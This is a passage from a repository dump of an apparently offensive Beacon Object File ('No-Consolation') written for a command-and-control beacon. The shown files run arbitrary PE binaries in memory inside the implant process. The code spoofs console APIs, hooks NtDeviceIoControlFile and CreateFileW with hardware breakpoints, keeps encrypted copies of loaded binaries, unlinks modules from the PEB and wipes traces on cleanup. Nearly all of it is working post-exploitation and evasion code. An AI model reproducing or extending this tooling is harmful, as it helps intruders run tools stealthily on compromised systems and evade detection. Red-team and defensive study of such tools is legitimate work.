                 ConsoleCpBuffer->InputType->Id2 == 0x4)
        {
            DPRINT("spoofing SetConsoleMode");

            return STATUS_SUCCESS;
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x2000014 &&
                 ConsoleCpBuffer->InputType->Id2 == 0x80)
        {
            DPRINT("spoofing GetConsoleTitleW");

            lpConsoleTitle = ConsoleCpBuffer->OutputPtr;
            lpConsoleTitle[0x0] = L'N';
            lpConsoleTitle[0x1] = L'o';
            lpConsoleTitle[0x2] = L'C';
            lpConsoleTitle[0x3] = L'o';
            lpConsoleTitle[0x4] = L'n';
            lpConsoleTitle[0x5] = L's';
            lpConsoleTitle[0x6] = L'o';
            lpConsoleTitle[0x7] = L'l';
            lpConsoleTitle[0x8] = L'a';
            lpConsoleTitle[0x9] = L't';
            lpConsoleTitle[0xa] = L'i';
            lpConsoleTitle[0xb] = L'o';
            lpConsoleTitle[0xc] = L'n';
            lpConsoleTitle[0xd] = L'\0';

            return STATUS_SUCCESS;
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x2000015 &&
                 ConsoleCpBuffer->InputType->Id2 == 0x10)
        {
            DPRINT("spoofing SetConsoleTitleW");

            return STATUS_SUCCESS;
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x1000008 &&
                 ConsoleCpBuffer->InputType->Id2 == 0x2)
        {
            DPRINT("spoofing SetTEBLangID");

            return STATUS_SUCCESS;
        }
    }

    if (ConsoleCpBuffer && ConsoleCpBuffer->InputType)
    {
        DPRINT_ERR("failed to understand message, Id1: %x, Id2: %d", ConsoleCpBuffer->InputType->Id1, ConsoleCpBuffer->InputType->Id2);
    }
    else
    {
        DPRINT_ERR("failed to understand message");
    }

    return STATUS_SUCCESS;
}

LONG CALLBACK NtDeviceIoControlFileHandler(
    PEXCEPTION_POINTERS exception)
{
    PVOID Addr = NULL;

    if (EXCEPTION_CODE( exception ) == STATUS_SINGLE_STEP)
    {
        // check if the exception address is NtDeviceIoControlFile
        Addr = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "NtDeviceIoControlFile", 0);
        if (EXCEPTION_CURRENT_IP( exception ) == Addr)
        {
            // check the first parameter is the ConsoleHandle
            if ((HANDLE)EXCEPTION_ARG_1( exception ) == get_console_handle())
            {
                // redirect execution to the fake NtDeviceIoControlFile
                EXCEPTION_SET_IP( exception, (ULONG_PTR)MyNtDeviceIoControlFile );

                return EXCEPTION_CONTINUE_EXECUTION;
            }
            else
            {
                // if the first parameter is not the ConsoleHandle, continue executing normally
                EXCEPTION_RESUME( exception );
                return EXCEPTION_CONTINUE_EXECUTION;
            }
        }
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

LONG CALLBACK CreateFileWHandler(
    PEXCEPTION_POINTERS exception)
{
    PVOID  Addr     = NULL;
    LPWSTR FileName = NULL;
    PVOID  Return   = NULL;

    if (EXCEPTION_CODE( exception ) == STATUS_SINGLE_STEP)
    {
        // check if the exception address is CreateFileW
        Addr = xGetProcAddress(xGetLibAddress("kernelbase", TRUE, NULL), "CreateFileW", 0);
        if (EXCEPTION_CURRENT_IP( exception ) == Addr)
        {
            // check the first parameter is CONOUT$
            FileName = (LPWSTR)EXCEPTION_ARG_1( exception );
            if (FileName &&
                FileName[0] == L'C' &&
                FileName[1] == L'O' &&
                FileName[2] == L'N' &&
                FileName[3] == L'O' &&
                FileName[4] == L'U' &&
                FileName[5] == L'T' &&
                FileName[6] == L'$' &&
                FileName[7] == L'\0')
            {
                DPRINT("Spoofing CreateFileW(\"CONOUT$\", ...)");

                // set a fake handle as return value, anything but -1 will do
                EXCEPTION_SET_RET( exception, 0x123 );

                // return
                Return = EXCEPTION_GET_RET( exception );
                EXCEPTION_ADJ_STACK( exception, sizeof( PVOID ) );
                EXCEPTION_SET_IP( exception, (ULONG_PTR)Return );

                return EXCEPTION_CONTINUE_EXECUTION;
            }
            else
            {
                // if the first parameter is not CONOUT$, continue executing normally
                EXCEPTION_RESUME( exception );
                return EXCEPTION_CONTINUE_EXECUTION;
            }
        }
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

/*
 * For PowerShell, we spoof a console by hooking
 * NtDeviceIoControlFile and CreateFileW using hardware breakpoints
 */
BOOL redirect_std_out_err_for_ps(
    IN PLOADED_PE_INFO peinfo)
{
    HANDLE hFakeConsoleHandle        = NULL;
    PVOID  AddrNtDeviceIoControlFile = NULL;
    PVOID  AddrCreateFileW           = NULL;

    DPRINT("redirect_std_out_err_for_ps");

    /*
     * if the PE did not load mscoree.dll, we can skip this step
     */
    if (!peinfo->loaded_mscoree)
    {
        DPRINT("PE didn't load mscoree.dll, skipping");
        return TRUE;
    }

    /*
     * if the operator decided to load a console, there is no need to spoof one
     */
    if (peinfo->alloc_console)
    {
        DPRINT("A console will be allocated, skipping")
        return TRUE;
    }

    /*
     * if a console is already allocated, there is no need to spoof one
     */
    if (get_console_handle())
    {
        DPRINT("A console is already allocated, skipping")
        return TRUE;
    }

    AddrNtDeviceIoControlFile = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL),      "NtDeviceIoControlFile", 0);
    AddrCreateFileW           = xGetProcAddress(xGetLibAddress("kernelbase", TRUE, NULL), "CreateFileW", 0);

    if (!AddrNtDeviceIoControlFile)
    {
        api_not_found("NtDeviceIoControlFile");
        return FALSE;
    }

    if (!AddrCreateFileW)
    {
        api_not_found("CreateFileW");
        return FALSE;
    }

    /*
     * set a hardware breakpoint on NtDeviceIoControlFile and CreateFileW
     */

    if (!set_hwbp(
        peinfo->hThread,
        AddrNtDeviceIoControlFile,
        NtDeviceIoControlFileHandler,
        NT_DEVICE_IO_CONTROL_FILE_INDEX,
        &peinfo->hHwBp1))
    {
        DPRINT_ERR("Failed to set HWBP on NTDLL$NtDeviceIoControlFile");
        return FALSE;
    }

    if (!set_hwbp(
        peinfo->hThread,
        AddrCreateFileW,
        CreateFileWHandler,
        CREATE_FILE_INDEX,
        &peinfo->hHwBp2))
    {
        DPRINT_ERR("Failed to set HWBP on KERNELBASE$CreateFileW");
        return FALSE;
    }

    /*
     * set a fake console handle on PEB->ProcessParameters->ConsoleHandle
     */

    int (WINAPI *rand) (void)  = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "rand", 0);
    if (!rand)
    {
        api_not_found("rand");
        return FALSE;
    }

    while (!hFakeConsoleHandle || hFakeConsoleHandle == get_std_in_handle())
    {
        hFakeConsoleHandle = (HANDLE)(ULONG_PTR)((rand() & (2047 - 1)) & ~3);
    }

    // save the original console handle
    peinfo->original_console_handle = get_console_handle();

    // set the fake console handle
    set_console_handle(hFakeConsoleHandle);

    peinfo->modified_console_handle = TRUE;

    DPRINT("fake console handle: 0x%x", hFakeConsoleHandle);

    return TRUE;
}

/*
 * Many binaries simply need the standard output and error
 * handles on the PEB->ProcessParameters structure to be overwritten
 * with the write handle from the anonymous pipe
 */
BOOL redirect_std_out_err_generic(
    IN PLOADED_PE_INFO peinfo)
{
    DPRINT("redirect_std_out_err_generic");

    // save the original values of StandardOutput/Error
    peinfo->original_user_params_stdout = get_std_out_handle();
    peinfo->original_user_params_stderr = get_std_err_handle();

    // set the pipe write handle as Stdout
    set_std_out_handle(peinfo->Handles->hWrite);
    peinfo->modified_user_params_stdout = TRUE;

    // set the pipe write handle as Stderr
    set_std_err_handle(peinfo->Handles->hWrite);
    peinfo->modified_user_params_stderr = TRUE;

    return TRUE;
}

/*
 * PowerShell doesn't like the output Pipe handles to change in between executions.
 * Because of this, we only create the anonymous pipe once.
 * To remember the pipe values, we use the Key/Value store from beacon
 */
BOOL recover_handle_info(
    IN PLOADED_PE_INFO peinfo)
{
    // try to recover the handle information from previous runs
    peinfo->Handles = BeaconGetValue(NC_HANDLE_INFO_KEY);

    if (peinfo->Handles)
    {
        DPRINT("Recovered handle information");
    }
    else
    {
        // this is the first run, create a new anonymous pipe
        DPRINT("Creating anonymous pipe");

        // allocate the HANDLE_INFO structure
        peinfo->Handles = intAlloc(sizeof(HANDLE_INFO));

        // create the pipe
        SECURITY_ATTRIBUTES sao = { sizeof(sao), NULL, TRUE };
        if (!CreatePipe(&peinfo->Handles->hRead, &peinfo->Handles->hWrite, &sao, 0))
        {
            function_failed("CreatePipe");
            return FALSE;
        }

        // save the handle information for future executions
        if (!BeaconAddValue(NC_HANDLE_INFO_KEY, peinfo->Handles))
        {
            function_failed("BeaconAddValue");
            return FALSE;
        }
    }

    return TRUE;
}

BOOL redirect_std_out_err(
    IN PLOADED_PE_INFO peinfo)
{
    if (peinfo->nooutput)
    {
        return TRUE;
    }

    if (!recover_handle_info(peinfo))
    {
        return FALSE;
    }

    /*
     * this works for:
     * - MinGW cross-compiled binaries
     * - clang cross-compiled binaries
     */
    if (!redirect_std_out_err_for_mingw(peinfo))
    {
        return FALSE;
    }

    /*
     * this works for:
     * - MSVC binaries compiled with link.exe
     */
    if (!redirect_std_out_err_for_msvc(peinfo))
    {
        return FALSE;
    }

    /*
     * this works for:
     * - CMD run with /c
     * - other binaries that call CreateProcessW
     */
    if (!redirect_std_out_err_for_cmd(peinfo))
    {
        return FALSE;
    }

    /*
     * this works for:
     * - PowerShell
     */
    if (!redirect_std_out_err_for_ps(peinfo))
    {
        return FALSE;
    }

    /*
     * This is disabled by default
     */
    if (!allocate_console(peinfo))
    {
        return FALSE;
    }

    /*
     * this works for:
     * - handle.exe
     * - PsExec.exe
     * - several other
     */
    if (!redirect_std_out_err_generic(peinfo))
    {
        return FALSE;
    }

    return TRUE;
}


================================================
FILE: Execution-BOF/No-Consolation/source/entry.c
================================================

#include <windows.h>
#include "output.h"
#include "peb.c"
#include "loader.c"
#include "console.c"
#include "runner.c"
#include "hwbp.c"
#include "utils.c"
#include "apisetlookup.c"

int go(IN PCHAR Buffer, IN ULONG Length)
{
    datap           parser        = { 0 };
    int             pe_length     = 0;
    LPSTR           pe_name       = NULL;
    LPWSTR          pe_wname      = NULL;
    LPWSTR          pe_wpath      = NULL;
    PVOID           pe_bytes      = 0;
    LPSTR           pe_path       = 0;
    BOOL            local         = FALSE;
    UINT32          timeout       = 0;
    BOOL            headers       = FALSE;
    LPWSTR          cmdwline      = NULL;
    LPCSTR          cmdline       = NULL;
    LPSTR           method        = NULL;
    BOOL            use_unicode   = FALSE;
    BOOL            nooutput      = FALSE;
    BOOL            alloc_console = FALSE;
    BOOL            close_handles = FALSE;
    LPSTR           unload_libs   = NULL;
    BOOL            dont_save     = FALSE;
    BOOL            list_pes      = FALSE;
    LPSTR           unload_pe     = NULL;
    BOOL            recovered_pe  = FALSE;
    LPSTR           loadtime      = NULL;
    BOOL            link_to_peb   = FALSE;
    BOOL            dont_unload   = FALSE;
    BOOL            load_all_deps = FALSE;
    LPSTR           load_all_deps_but = NULL;
    LPSTR           load_deps     = NULL;
    LPSTR           search_paths  = NULL;
    PLIB_LOADED     lib_loaded    = NULL;
    PLIB_LOADED     lib_tmp       = NULL;
    PLOADED_PE_INFO peinfo        = NULL;
    PLIBS_LOADED    libs_loaded   = NULL;
    PMEMORY_STRUCTS mem_structs   = NULL;
    BOOL            inthread      = FALSE;

    BeaconDataParse(&parser, Buffer, Length);
    pe_wname      = (LPWSTR)BeaconDataExtract(&parser, NULL);
    pe_wname      = pe_wname[0] ? pe_wname : NULL;
    pe_name       = BeaconDataExtract(&parser, NULL);
    pe_name       = pe_name[0] ? pe_name : NULL;
    pe_wpath      = (LPWSTR)BeaconDataExtract(&parser, NULL);
    pe_wpath      = pe_wpath[0] ? pe_wpath : NULL;
    pe_bytes      = BeaconDataExtract(&parser, &pe_length);
    pe_path       = BeaconDataExtract(&parser, NULL);
    pe_path       = pe_path[0] ? pe_path : NULL;
    local         = BeaconDataInt(&parser);
    timeout       = BeaconDataInt(&parser);
    headers       = BeaconDataInt(&parser);
    cmdwline      = (LPWSTR)BeaconDataExtract(&parser, NULL);
    cmdline       = BeaconDataExtract(&parser, NULL);
    method        = BeaconDataExtract(&parser, NULL);
    use_unicode   = BeaconDataInt(&parser);
    nooutput      = BeaconDataInt(&parser);
    alloc_console = BeaconDataInt(&parser);
    close_handles = BeaconDataInt(&parser);
    unload_libs   = BeaconDataExtract(&parser, NULL);
    unload_libs   = unload_libs[0] ? unload_libs : NULL;
    dont_save     = BeaconDataInt(&parser);
    list_pes      = BeaconDataInt(&parser);
    unload_pe     = BeaconDataExtract(&parser, NULL);
    unload_pe     = unload_pe[0] ? unload_pe : NULL;
    loadtime      = BeaconDataExtract(&parser, NULL);
    loadtime      = loadtime[0] ? loadtime : NULL;
    link_to_peb   = BeaconDataInt(&parser);
    dont_unload   = BeaconDataInt(&parser);
    load_all_deps = BeaconDataInt(&parser);
    load_all_deps_but = BeaconDataExtract(&parser, NULL);
    load_all_deps_but = load_all_deps_but[0] ? load_all_deps_but : NULL;
    load_deps     = BeaconDataExtract(&parser, NULL);
    load_deps     = load_deps[0] ? load_deps : NULL;
    search_paths  = BeaconDataExtract(&parser, NULL);
    search_paths  = search_paths[0] ? search_paths : NULL;
    inthread      = BeaconDataInt(&parser);

    peinfo = intAlloc(sizeof(LOADED_PE_INFO));

    StringCopyA(peinfo->pe_name,  pe_name ? pe_name : "NoConsolation.dll");
    wcscpy(peinfo->pe_wname, pe_wname ? pe_wname : L"NoConsolation.dll");
    wcscpy(peinfo->pe_wpath, pe_wpath ? pe_wpath : L"C:\\Windows\\System32\\NoConsolation.dll");
    peinfo->timeout       = timeout;
    peinfo->headers       = headers;
    peinfo->method        = method[0] ? method : NULL;
    peinfo->use_unicode   = use_unicode;
    peinfo->cmdwline      = cmdwline[0] ? cmdwline : NULL;
    peinfo->cmdline       = cmdline[0] ? cmdline : NULL;
    peinfo->nooutput      = nooutput;
    peinfo->alloc_console = alloc_console;
    peinfo->link_to_peb   = link_to_peb;
    peinfo->dont_unload   = dont_unload;
    peinfo->is_dependency = FALSE;
    peinfo->load_all_deps = load_all_deps;
    peinfo->load_all_deps_but = load_all_deps_but;
    peinfo->load_deps     = load_deps;
    peinfo->search_paths  = search_paths;
    peinfo->custom_loaded = TRUE;
    peinfo->inthread      = inthread;

    // save a reference to peinfo
    BeaconAddValue(NC_PE_INFO_KEY, peinfo);

    // init the 'DLLs loaded' linked list
    libs_loaded = BeaconGetValue(NC_LOADED_DLL_KEY);
    if (!libs_loaded)
    {
        libs_loaded = intAlloc(sizeof(LIBS_LOADED));
        libs_loaded->list.Flink = libs_loaded->list.Blink = &libs_loaded->list;
        BeaconAddValue(NC_LOADED_DLL_KEY, libs_loaded);
    }

    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (!mem_structs)
    {
        mem_structs = intAlloc(sizeof(MEMORY_STRUCTS));
        BeaconAddValue(NC_MEM_STRUCTS_KEY, mem_structs);
    }

    if (list_pes)
    {
        list_saved_pes();
        goto Cleanup;
    }

    if (unload_pe)
    {
        if (remove_saved_pe(unload_pe))
        {
            PRINT("removed %s", unload_pe);
            goto Cleanup;
        }
        else
        {
            PRINT_ERR("failed to remove %s", unload_pe);
            goto Cleanup;
        }
    }

    // if no PE was provided, go to cleanup
    if (!pe_name && !pe_path && !pe_length)
        goto Cleanup;

    // the PE was provided by the operator
    if (pe_bytes && pe_length)
    {
        if (!dont_save)
            save_pe_info(pe_name, pe_bytes, pe_length, loadtime);
    }
    // read PE from local filesystem
    else if (local)
    {
        if (!read_local_pe(pe_path, &pe_bytes, &pe_length))
        {
            PRINT_ERR("failed to load %s", pe_path);
            goto Cleanup;
        }
        if (!dont_save)
            save_pe_info(pe_name, pe_bytes, pe_length, loadtime);
    }
    // recover executable from saved PEs
    else
    {
        if (!get_saved_pe(pe_name, &pe_bytes, &pe_length))
        {
            PRINT_ERR("failed to load %s from saved binaries", pe_name);
            goto Cleanup;
        }
        recovered_pe = TRUE;
    }

    if (!load_pe(pe_bytes, pe_length, peinfo))
    {
        PRINT_ERR("peload failure");
        goto Cleanup;
    }

    if (peinfo->inthread)
    {
        peinfo->hThread = NtCurrentThread();
    }
    else
    {
        if (!create_thread(&peinfo->hThread))
        {
            PRINT_ERR("failed to create thread");
            goto Cleanup;
        }
    }

    if (!redirect_std_out_err(peinfo))
    {
        PRINT_ERR("failed to redirect output");
        goto Cleanup;
    }

    if (!run_pe(peinfo))
    {
        PRINT_ERR("failed to run pe");
        goto Cleanup;
    }

Cleanup:
    if (recovered_pe)
        reencrypt_pe(pe_name);

    if (local && pe_bytes)
    {
        memset(pe_bytes, 0, pe_length);
        intFree(pe_bytes);
    }

    if (peinfo && peinfo->inthread && peinfo->hHwBp1)
        unset_hwbp(peinfo->hThread, NT_DEVICE_IO_CONTROL_FILE_INDEX);

    if (peinfo && peinfo->inthread && peinfo->hHwBp2)
        unset_hwbp(peinfo->hThread, CREATE_FILE_INDEX);

    if (peinfo && peinfo->hHwBp1)
        remove_hwbp_handler(peinfo->hHwBp1);

    if (peinfo && peinfo->hHwBp2)
        remove_hwbp_handler(peinfo->hHwBp2);

    if (close_handles)
    {
        DPRINT("Freeing handles");
        if (peinfo && peinfo->Handles && peinfo->Handles->fo_msvc)
        {
            void ( WINAPI *msvcrt_close ) ( int ) = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "_close", 0);
            if (msvcrt_close)
                msvcrt_close(peinfo->Handles->fo_msvc);
        }

        if (peinfo && peinfo->Handles && peinfo->Handles->fo_ucrtbase)
        {
            void ( WINAPI *ucrtbase_close ) ( int ) = xGetProcAddress(xGetLibAddress("ucrtbase", TRUE, NULL), "_close", 0);
            if (ucrtbase_close)
                ucrtbase_close(peinfo->Handles->fo_ucrtbase);
        }

        if (peinfo && peinfo->Handles && peinfo->Handles->hRead)
            NtClose(peinfo->Handles->hRead);

        if (peinfo && peinfo->Handles && peinfo->Handles->hWrite)
            NtClose(peinfo->Handles->hWrite);

        if (peinfo && peinfo->Handles)
        {
            memset(peinfo->Handles, 0, sizeof(HANDLE_INFO));
            intFree(peinfo->Handles);
        }

        BeaconRemoveValue(NC_HANDLE_INFO_KEY);
    }

    if (peinfo && peinfo->modified_msvc_stdout)
        memcpy(peinfo->msvc_stdout, peinfo->original_msvc_stdout, sizeof(FILE));

    if (peinfo && peinfo->modified_msvc_stderr)
        memcpy(peinfo->msvc_stderr, peinfo->original_msvc_stderr, sizeof(FILE));

    if (peinfo && peinfo->modified_ucrtbase_stdout)
        memcpy(peinfo->ucrtbase_stdout, peinfo->original_ucrtbase_stdout, sizeof(UCRTBASE_FILE));

    if (peinfo && peinfo->modified_ucrtbase_stderr)
        memcpy(peinfo->ucrtbase_stderr, peinfo->original_ucrtbase_stderr, sizeof(UCRTBASE_FILE));

    if (peinfo && peinfo->original_msvc_stdout)
    {
        memset(peinfo->original_msvc_stdout, 0, sizeof(FILE));
        intFree(peinfo->original_msvc_stdout);
    }

    if (peinfo && peinfo->original_msvc_stderr)
    {
        memset(peinfo->original_msvc_stderr, 0, sizeof(FILE));
        intFree(peinfo->original_msvc_stderr);
    }

    if (peinfo && peinfo->original_ucrtbase_stdout)
    {
        memset(peinfo->original_ucrtbase_stdout, 0, sizeof(UCRTBASE_FILE));
        intFree(peinfo->original_ucrtbase_stdout);
    }

    if (peinfo && peinfo->original_ucrtbase_stderr)
    {
        memset(peinfo->original_ucrtbase_stderr, 0, sizeof(UCRTBASE_FILE));
        intFree(peinfo->original_ucrtbase_stderr);
    }

    if (peinfo && peinfo->modified_console_handle)
        set_console_handle(peinfo->original_console_handle);

    if (peinfo && peinfo->modified_console_reference)
        *(PHANDLE)peinfo->console_reference_addr = peinfo->original_console_reference;

    if (peinfo && peinfo->hThread && !peinfo->inthread)
    {
        TerminateThread(peinfo->hThread, 0);
        NtClose(peinfo->hThread);
    }

    // free all dependencies
    lib_loaded = (PLIB_LOADED)libs_loaded->list.Flink;
    while (&lib_loaded->list != &libs_loaded->list)
    {
        lib_tmp = (PLIB_LOADED)lib_loaded->list.Flink;

        if (!lib_loaded->peinfo->dont_unload && lib_loaded->peinfo->custom_loaded)
        {
            unload_dependency(lib_loaded->peinfo);
            unlink_from_list(&lib_loaded->list);

            memset(lib_loaded->peinfo, 0, sizeof(LOADED_PE_INFO));
            intFree(lib_loaded->peinfo);
            memset(lib_loaded, 0, sizeof(LIB_LOADED));
            intFree(lib_loaded);
        }

        lib_loaded = lib_tmp;
    }

    if (unload_libs)
    {
        lib_loaded = (PLIB_LOADED)libs_loaded->list.Flink;
        while (&lib_loaded->list != &libs_loaded->list)
        {
            lib_tmp = (PLIB_LOADED)lib_loaded->list.Flink;

            DPRINT("unload_libs: %s, lib_loaded->name: %s", unload_libs, lib_loaded->name);
            if (string_is_included(unload_libs, lib_loaded->name))
            {
                PRINT("unloaded %s", lib_loaded->name);
                if (lib_loaded->peinfo->custom_loaded)
                    unload_dependency(lib_loaded->peinfo);
                else
                    FreeLibrary(lib_loaded->address);

                unlink_from_list(&lib_loaded->list);
                memset(lib_loaded->peinfo, 0, sizeof(LOADED_PE_INFO));
                intFree(lib_loaded->peinfo);
                memset(lib_loaded, 0, sizeof(LIB_LOADED));
                intFree(lib_loaded);
            }

            lib_loaded = lib_tmp;
        }
    }

    if (peinfo && !peinfo->dont_unload)
    {
        unload_dependency(peinfo);
        memset(peinfo, 0, sizeof(LOADED_PE_INFO));
        intFree(peinfo);
    }

    BeaconRemoveValue(NC_PE_INFO_KEY);

    return 0;
}


================================================
FILE: Execution-BOF/No-Consolation/source/hwbp.c
================================================

#include "hwbp.h"
#include "peb.h"

ULONG_PTR set_bits(
    IN ULONG_PTR dw,
    IN int lowBit,
    IN int bits,
    IN ULONG_PTR newValue)
{
    ULONG_PTR mask = (1UL << bits) - 1UL;
    dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
    return dw;
}

BOOL enable_breakpoint(
    OUT CONTEXT* ctx,
    IN PVOID address,
    IN int index)
{
    switch (index)
    {
        case 0:
            ctx->Dr0 = (ULONG_PTR)address;
            break;
        case 1:
            ctx->Dr1 = (ULONG_PTR)address;
            break;
        case 2:
            ctx->Dr2 = (ULONG_PTR)address;
            break;
        case 3:
            ctx->Dr3 = (ULONG_PTR)address;
            break;
        default:
            DPRINT("Invalid index: %d", index);
            return FALSE;
    }

    ctx->Dr7 = set_bits(ctx->Dr7, 16, 16, 0);
    ctx->Dr7 = set_bits(ctx->Dr7, (index * 2), 1, 1);

    return TRUE;
}

VOID clear_breakpoint(
    IN CONTEXT* ctx,
    IN DWORD index)
{
    // Clear the releveant hardware breakpoint
    switch (index)
    {
        case 0:
            ctx->Dr0 = 0;
            break;
        case 1:
            ctx->Dr1 = 0;
            break;
        case 2:
            ctx->Dr2 = 0;
            break;
        case 3:
            ctx->Dr3 = 0;
            break;
    }

    ctx->Dr7 = set_bits(ctx->Dr7, (index * 2), 1, 0);
    ctx->Dr6 = 0;
    ctx->EFlags = 0;
}

BOOL set_hwbp(
    IN HANDLE hThread,
    IN PVOID address,
    IN exception_callback hwbp_handler,
    IN UINT32 index,
    OUT PHANDLE phHwBpHandler)
{
    BOOL     ret_val      = FALSE;
    NTSTATUS status       = STATUS_UNSUCCESSFUL;
    HANDLE   hHwBpHandler = NULL;
    CONTEXT  threadCtx    = { 0 };

    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

    PVOID (WINAPI* RtlAddVectoredExceptionHandler) (ULONG, exception_callback) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlAddVectoredExceptionHandler", 0);
    if (!RtlAddVectoredExceptionHandler)
    {
        api_not_found("RtlAddVectoredExceptionHandler");
        goto Cleanup;
    }

    hHwBpHandler = RtlAddVectoredExceptionHandler(1, hwbp_handler);
    if (!hHwBpHandler)
    {
        function_failed("RtlAddVectoredExceptionHandler");
        goto Cleanup;
    }

    status = NtGetContextThread(hThread, &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtGetContextThread", status);
        goto Cleanup;
    }

    if (!enable_breakpoint(&threadCtx, address, index))
        goto Cleanup;

    status = NtSetContextThread(hThread, &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetContextThread", status);
        goto Cleanup;
    }

    if (phHwBpHandler)
        *phHwBpHandler = hHwBpHandler;

    ret_val = TRUE;

Cleanup:
    return ret_val;
}

VOID remove_hwbp_handler(
    IN HANDLE hHwBpHandler)
{
    if (!hHwBpHandler)
        return;

    ULONG (WINAPI* RtlRemoveVectoredExceptionHandler) (PVOID) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlRemoveVectoredExceptionHandler", 0);
    if (!RtlRemoveVectoredExceptionHandler)
    {
        api_not_found("RtlRemoveVectoredExceptionHandler");
        return;
    }

    if (!RtlRemoveVectoredExceptionHandler(hHwBpHandler))
    {
        function_failed("RtlRemoveVectoredExceptionHandler");
    }
}

VOID unset_hwbp(
    IN HANDLE hThread,
    IN UINT32 index)
{
    NTSTATUS status    = STATUS_UNSUCCESSFUL;
    CONTEXT  threadCtx = { 0 };

    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_ALL;

    status = NtGetContextThread(hThread, &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtGetContextThread", status);
        goto cleanup;
    }

    clear_breakpoint(&threadCtx, index);

    status = NtSetContextThread(hThread, &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetContextThread", status);
        goto cleanup;
    }

cleanup:
    return;
}


================================================
FILE: Execution-BOF/No-Consolation/source/loader.c
================================================

#include "loader.h"

VOID unload_dependency(
    IN PLOADED_PE_INFO peinfo)
{
    //DllMain_t DllMain = NULL;
    NTSTATUS  status  = STATUS_UNSUCCESSFUL;
    //FP        fp      = { 0 };

    if (!peinfo || !peinfo->pe_base)
        return;

    if (!peinfo->dont_unload && peinfo->custom_loaded)
    {
        if (peinfo->is_dll && peinfo->DllMain)
        {
            /*
             * Calling DllMain with DLL_PROCESS_DETACH seems to break future
             * loads of mscoree.dll, so we avoid it
             */

            //DPRINT("Executing DllMain(hinstDLL, DLL_PROCESS_DETACH, NULL) for %s", peinfo->pe_name);
            //DllMain = peinfo->DllMain;
            //DllMain(peinfo->pe_base, DLL_PROCESS_DETACH, NULL);
        }

        /*
        if (!peinfo->is_dependency && peinfo->handled_tls)
        {
            fp.ptr = find_ldrp_release_tls_entry();;
            if (fp.ptr)
                fp.thiscall(peinfo->ldr_entry);
        }
        /*/

#ifdef _WIN64
        if (peinfo->func_table)
            remove_inverted_function_table_entry(peinfo->func_table);
#endif

        if (peinfo->linked)
            unlink_module(peinfo->ldr_entry);

        if (peinfo->ldr_entry)
        {
            memset(((PLDR_DATA_TABLE_ENTRY2)peinfo->ldr_entry)->BaseDllName.Buffer, 0, sizeof(WCHAR) * MAX_PATH);
            intFree(((PLDR_DATA_TABLE_ENTRY2)peinfo->ldr_entry)->BaseDllName.Buffer);
            memset(((PLDR_DATA_TABLE_ENTRY2)peinfo->ldr_entry)->FullDllName.Buffer, 0, sizeof(WCHAR) * MAX_PATH);
            intFree(((PLDR_DATA_TABLE_ENTRY2)peinfo->ldr_entry)->FullDllName.Buffer);
            memset(peinfo->ldr_entry, 0, sizeof(PLDR_DATA_TABLE_ENTRY2));
            intFree(peinfo->ldr_entry);
        }

        if (peinfo->pe_base)
        {
            peinfo->pe_size = 0;
            status = NtFreeVirtualMemory(NtCurrentProcess(), &peinfo->pe_base, &peinfo->pe_size, MEM_RELEASE);
            if (!NT_SUCCESS(status))
            {
                syscall_failed("NtFreeVirtualMemory", status);
                PRINT_ERR("Failed to cleanup PE from memory");
            }
        }
    }
}

BOOL find_dll(
    IN PLOADED_PE_INFO dep,
    IN LPSTR dll_name,
    OUT PVOID* pe_bytes,
    OUT int* pe_length)
{
    LPSTR search_paths      = dep->search_paths ? dep->search_paths : "C:\\Windows\\System32\\\0";
    CHAR  pe_path[MAX_PATH] = { 0 };
    DWORD i                 = 0;

    for (;;)
    {
        // store string until null byte, semi-colon or comma encountered
        for (i = 0; search_paths[i] != '\0' &&
                    search_paths[i] != ';' &&
                    search_paths[i] != ','; i++) pe_path[i] = search_paths[i];
        // nothing stored? end
        if (i == 0) break;
        // skip name plus one for separator
        search_paths += (i + 1);
        // ensure the path ends with a backslash
        if (pe_path[i-1] != '\\')
        {
            pe_path[i] = '\\';
            i++;
        }
        // store null terminator
        pe_path[i] = '\0';
        // add the name of the DLL
        StringConcatA(pe_path, dll_name);
        // try to read the PE
        if (read_local_pe(pe_path, pe_bytes, pe_length))
        {
            // set the PE path
            CharStringToWCharString(dep->pe_wpath, pe_path, MAX_PATH);
            return TRUE;
        }
    }

    DPRINT_ERR("Failed to find %s", dll_name);

    return FALSE;
}

BOOL load_dependency(
    IN PLOADED_PE_INFO dep,
    IN LPSTR dll_name)
{
    PVOID pe_bytes  = NULL;
    int   pe_length = 0;

    if (!find_dll(dep, dll_name, &pe_bytes, &pe_length))
        return FALSE;

    return load_pe(pe_bytes, pe_length, dep);
}

PVOID handle_dependency(
    IN PLOADED_PE_INFO peinfo,
    IN LPSTR dll_name)
{
    LPSTR           name        = NULL;
    BOOL            api_set_ok  = FALSE;
    PVOID           dll         = NULL;
    PLOADED_PE_INFO dep         = NULL;
    PLIB_LOADED     lib_loaded  = NULL;
    PLIBS_LOADED    libs_loaded = NULL;

    // resolve the API Set
    name = api_set_resolve(dll_name);
    api_set_ok = name != NULL;
    if (!api_set_ok)
        name = dll_name;

    // if the name is empty, just return (this happens with ext-ms-win32-subsystem-query-l1-1-0.dll)
    if (name[0] == '\0') return NULL;

    // check if the DLL is already loaded
    dll = xGetLibAddress(name, FALSE, NULL);

    if (!dll)
    {
        /*
         * Here we handle a peculiar edge case:
         * 1) we are loading mprext.dll and realize it requires MPR.dll
